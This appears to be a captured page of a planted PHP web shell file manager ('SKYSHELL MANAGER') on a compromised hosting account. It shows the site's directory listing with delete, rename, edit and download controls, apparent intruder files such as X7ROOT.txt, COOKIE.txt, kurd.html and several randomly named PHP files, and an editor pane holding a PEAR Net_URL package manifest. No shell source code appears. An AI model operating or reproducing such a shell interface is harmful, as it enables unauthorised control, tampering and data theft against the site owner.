📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: Net_URL.xml
<?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.6.0" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>Net_URL</name> <channel>pear.php.net</channel> <summary>Easy parsing of Urls</summary> <description>Provides easy parsing of URLs and their constituent parts.</description> <lead> <name>Richard heyes</name> <user>richard</user> <email>richard@php.net</email> <active>no</active> </lead> <lead> <name>David Coallier</name> <user>davidc</user> <email>davidc@php.net</email> <active>yes</active> </lead> <date>2007-06-28</date> <time>10:57:03</time> <version> <release>1.0.15</release> <api>1.0.15</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>- Fixed Bug #11385 $url was defined. - Fixed Doc #11017 Fixed docblock problem (cweiske) - Fixed Bug #11008 (Override object properties in initialize()) - Fixed Bug #6338 Wrong query string handling - Fixed Bug #704 Fixed hardcoded value and use ini_get(arg_separator) - Fixed Bug #1036 Improper default port number detection - Fixed Bug #1447 use $_SERVER instead of HTTP_SERVER_VARS - Fixed Bug #1558 _parseRawQueryString failed if arg_sep.input was more than 1 char. - Fixed Bug #1682 File was in DOC format rather than Unix - Fixed Bug #2334 Sqare brackets in var names were encoded - Fixed Bug #2824 Better error handling support. - Fixed bug #3159 setProtocol was calling getStandardPort incorrectly</notes> <contents> <dir name="/"> <file baseinstalldir="Net" md5sum="af793351a5f00e31a2df697b54cfbc02" name="docs/example.php" role="doc" /> <file baseinstalldir="Net" md5sum="0488b5531c31332113100971be7ba2d9" name="docs/6470.php" role="doc" /> <file baseinstalldir="Net" md5sum="c7e690d656b56cc48a12399331a35b27" name="URL.php" role="php" /> </dir> </contents> <dependencies> <required> <php> <min>4.0.0</min> </php> <pearinstaller> <min>1.4.0b1</min> </pearinstaller> </required> </dependencies> <phprelease /> <changelog> <release> <version> <release>1.0.14</release> <api>1.0.14</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2004-06-19</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Whitespace</notes> </release> <release> <version> <release>1.0.13</release> <api>1.0.13</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2004-06-05</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Fix bug 1558</notes> </release> <release> <version> <release>1.0.12</release> <api>1.0.12</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2004-05-08</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Bug fixes release (#704 and #1036)</notes> </release> <release> <version> <release>1.0.11</release> <api>1.0.11</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2004-01-17</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Bug fixes release (#83 and #471)</notes> </release> <release> <version> <release>1.0.10</release> <api>1.0.10</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-04-06</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Be more flexible in what constitutes a scheme</notes> </release> <release> <version> <release>1.0.9</release> <api>1.0.9</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-04-05</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Fix couple of absolute URL bugs.</notes> </release> <release> <version> <release>1.0.8</release> <api>1.0.8</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-03-06</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Various bugs. Remove auto setting of default url to '/' if a url is supplied to the constructor. May cause BC issues.</notes> </release> <release> <version> <release>1.0.7</release> <api>1.0.7</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-12-07</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Added method to resolve URL paths of //, ../ and ./</notes> </release> <release> <version> <release>1.0.6</release> <api>1.0.6</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-12-07</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Make usage of [] optional</notes> </release> <release> <version> <release>1.0.5</release> <api>1.0.5</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-11-14</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Allow for URLS such as ...?foo</notes> </release> <release> <version> <release>1.0.4</release> <api>1.0.4</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-07-27</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>License change</notes> </release> <release> <version> <release>1.0.3</release> <api>1.0.3</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-06-20</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Now uses HTTP_HOST if available.</notes> </release> <release> <version> <release>1.0.2</release> <api>1.0.2</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-04-28</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>updated to fix a minor irritation when running on windows</notes> </release> <release> <version> <release>1.0.1</release> <api>1.0.1</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-04-28</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>Maintenance release. Bugs fixed with path detection and defaults.</notes> </release> <release> <version> <release>1.0</release> <api>1.0</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <date>2002-02-17</date> <license uri="http://www.opensource.org/licenses/bsd-license.php">BSD</license> <notes>This is the initial release of the Net_URL package.</notes> </release> </changelog> </package>
Save